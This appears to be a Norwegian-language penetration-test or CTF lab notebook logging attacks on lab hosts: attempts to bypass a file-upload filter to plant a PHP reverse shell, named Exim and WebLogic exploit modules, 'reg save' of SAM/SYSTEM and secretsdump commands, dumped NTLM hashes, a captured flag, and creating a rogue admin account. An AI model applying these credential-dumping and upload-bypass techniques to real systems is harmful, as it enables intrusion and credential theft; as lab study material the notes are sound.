Microsoft Windows [Version 10.0.14393] *  ### Dumpe credentials * Mimikatz * Får ikke eksekvert på host * Dumper registre og forsøker å finne hasher lokalt * Administrator har Null-LM hash, men NTLM er satt * Forsøker å cracke med Hashcat ### OBSERVE: - Kan lage ny bruker? - Guest disabled - Har sysrettigheter ## 11.77 (pavonis) "Project Jade" kjører på port 80 Har en upload form: http://172.16.11.77/upload.php * Ment for upload av FASTA-format * https://en.wikipedia.org/wiki/FASTA_format Mulig å laste opp og aksessere en egen php fil? * Forsøkt å laste opp gyldig fasta fil med extension .fasta * Upload Failed * Fikk lastet opp filen ved å bruke filename fasta.txt * fasta.txt.php fungerer også * gjelder også fasta.php * Fikk lastet opp revshell ved å kalle det revshell.fasta lokalt men bruke filnavnet revshell.php under File Name i upload fanen * Må finne hvor revshellet ligger for å få det eksekvert * Ligger under /uploads * Filnavnet filen lagres med under /uploads er det originale navnet (revshell.fasta) * Å laste opp revshell.php med File Name revshell.fasta fungerer ikke * Revshell.fasta.php fungerer heller ikke * Har lastet opp filen revshell.fasta med File Name satt som revshell.fasta flere ganger * Får Upload Failed og Successful omtrent annen hver gang, usikker på hva som avgjør * Ser ut som PHP-filer ikke kan lastes opp * Får heller ikke lastet opp .sh filer * .php5 fungerer ikke * .php%20 fungerer ikke * .fasta.php%00 fungerer ikke * Forsøkt med intercept i BURP og endre navn på filene * Kommer til successful upload, men får fortsatt ikke plassert .php fil på serveren * Forsøkt med path traversal i uploaden med både burp og direkte i filnavnet * :( innholdet fasta filen: ``` FASTA DATA <?php ``` ## Poke 11.x ### 11.44 (spinon) Open ports, but no clear answers SMB pwd not working Kunne provd vilkarlig exploits, men for noisy? ### 11.91 (toliman) (Revert) Ran with -Pn No response at all ### 11.19 (triton) ``` PORT STATE SERVICE 22/tcp open ssh 25/tcp open smtp 80/tcp open http 443/tcp open https ``` ``` └─$ nc 172.16.11.19 25 220 triton ESMTP Exim 4.89 Wed, 02 Nov 2022 10:59:09 -0400 ``` Sjekke 80/443 Local Exploit: /CVE-2019-10149 exploit/linux/local/exim4_deliver_message_priv_esc #### WebExploit: Finner flere, men vet ikke versjon Moving on since not Windows. ## 11.23 Ulysses 9090: Fedora Server 22: ssh ## 11.42 Tharsis Kjorer :80 - sier moved til "WebLogic server" pa :7001/demo http :7001/demo kjorer Servlet/2.5 JSP/2.1 Forsoker a finne version til WebLogic server :80 kjorer Microsoft-IIS/10.0 Finner CVE-2019-2725 multi/misc/weblogic_deserialize_asyncresponseservice Plan: - Find flag - reg save HKLM\sam sam.save - reg save HKLM\system system.save - Download in meterpreter - `python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -sam sam.save -system system.save` - Get hashes - List C:\Users - Check domain (NET DOMAIN) - Get-ADDomain -Current LoggedOnUser Results: 1. Flag: tharsis{9ac80954df4624d783c0747e5c2c2bdb} 2. Hashes ``` (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:eaa015f9288e6ced098536acca87d84b::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: weblogic:1000:aad3b435b51404eeaad3b435b51404ee:3d3c0ba2839535ab9fe5cbed7dae438e::: ``` 3. Domene ``` C:\Oracle\Middleware\user_projects\domains\water_domain>net VIEW net VIEW Server Name Remark ------------------------------------------------------------------------------- \\COMPUTADORA computadora server (Samba, Ubuntu) \\FILESERVER01 fileserver01 server (Samba, Ubuntu) \\LAND land server (Samba, Ubuntu) \\WEB The command completed successfully. ``` Lagde ny bruker med admin for a se litt rundt pa nettverkstilgang.  # 14.115 Crow Port 80 åpen http://172.16.14.115/info.php eksisterer - Apache 2.4.37 Bruker Wordpress, kan se om vi finner wordpress exploits WPScan? # 11.10 Sycorax 22 og 2121 åpen 2121 er FTP proxy Får ikke logget inn med anonymous? # 11.182 Elara Fikk tips fra en samarbeidspartner. 182 kjører "KodExplorer" Default creds er guest/guest: https://github.com/kalcaddle/KodExplorer/blob/6d2521176eb662b5572fc961cc1bdda6ba310bcd/config/i18n/en/main.php Logger inn, kjører KodExplorer v4.25 Brukere:  'pathInfo','pathList','treeList','pathChmod', 'mkdir','mkfile','pathRname','pathDelete','zip','unzip','unzipList', ## Hostnames |Hostname|ip| |--|--| |COMPUTADORA|172.16.11.66| |FILESERVER01|172.16.11.182|